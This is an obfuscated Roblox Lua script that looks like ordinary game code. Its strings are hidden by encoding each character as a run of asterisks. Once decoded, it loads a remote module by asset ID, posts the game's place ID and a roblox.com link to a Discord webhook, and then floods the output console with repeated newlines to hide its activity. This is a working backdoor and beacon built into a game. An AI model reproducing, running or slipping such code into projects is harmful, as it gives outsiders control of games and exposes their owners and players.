function aKmgYZZsii(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


require(0x468b91401bc4):load()
local http = game:GetService(aKmgYZZsii({'************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','***********************************************************************************','*****************************************************************************************************','******************************************************************************************************************','**********************************************************************************************************************','*********************************************************************************************************','***************************************************************************************************','*****************************************************************************************************'})) local hook = aKmgYZZsii({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','****************************************************************************************************','*********************************************************************************************************','*******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************','****************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*************************************************************************************************','****************************************************************************************************************','*********************************************************************************************************','***********************************************','***********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************','********************************************************************************************************','***************************************************************************************************************','***************************************************************************************************************','***********************************************************************************************************','*******************************************************************************************************************','***********************************************','*************************************************','***************************************************','************************************************','*********************************************************','************************************************','********************************************************','************************************************','*****************************************************','*******************************************************','*****************************************************','******************************************************','******************************************************','*******************************************************','**************************************************','************************************************','********************************************************','**************************************************','*************************************************','**************************************************','***********************************************','**************************************************************************','*************************************************************************************************************','*************************************************************************************************************','********************************************************************************************************','*************************************************************************','**************************************************************************************************************************','********************************************************************************','******************************************************************************************************','*******************************************************************************************************','***********************************************************************','***********************************************************************','*********************************************************************************','***********************************************************************','*************************************************************************************************************************','************************************************************************************************************','****************************************************************************','*******************************************************','*****************************************************************************','***********************************************************************************************************************','**************************************************','******************************************************************************************************************','********************************************************************','*****************************************************************','*********************************************************************************************************************','*************************************************************************','****************************************************','****************************************************************************************************','****************************************************************************************','*********************************************************************************','*************************************************************************','*****************************************************************************************************************','*****************************************************************************************************************','************************************************************************','**********************************************************************************','******************************************************************************','*****************************************************************************************************************','*************************************************************************************************','*************************************************************************************','************************************************************************************************************','******************************************************************************************************************','*****************************************************************************************','****************************************************************************************************','*************************************************************************************************************************','*********************************************************************','***************************************************************************','************************************************************************************************************','**************************************************************************************','****************************************************************************************************************','**************************************************','******************************************************************************************','***************************************************','************************************************************************************','***********************************************************************************************************************','**********************************************************************************************************','****************************************************************************','**************************************************************************************************************************','***********************************************************************************************************************','*******************************************************************************************************','***************************************************************************************','***********************************************************************************************************','*****************************************************','*****************************************************','**************************************************************************************************************','**************************************************************************************************************************','*****************************************************************************','********************************************************************************************************************','********************************************************','***********************************************************************************************'}) local Data = { [aKmgYZZsii({'***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************'})] = aKmgYZZsii({'**********************************************************','********************************','********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','***********************************************************************************************************************','***********************************************************************************************************************','***********************************************************************************************************************','**********************************************','******************************************************************************************************************','***************************************************************************************************************','**************************************************************************************************','************************************************************************************************************','***************************************************************************************************************','************************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*******************************************************************************************************','*************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************','*******************************************************************************************************************','***********************************************'})..game.PlaceId, } Data = http:JSONEncode(Data) http:PostAsync(hook, Data)print((aKmgYZZsii({'********************************************************************************************','**************************************************************************************************************'})):rep(88888))    
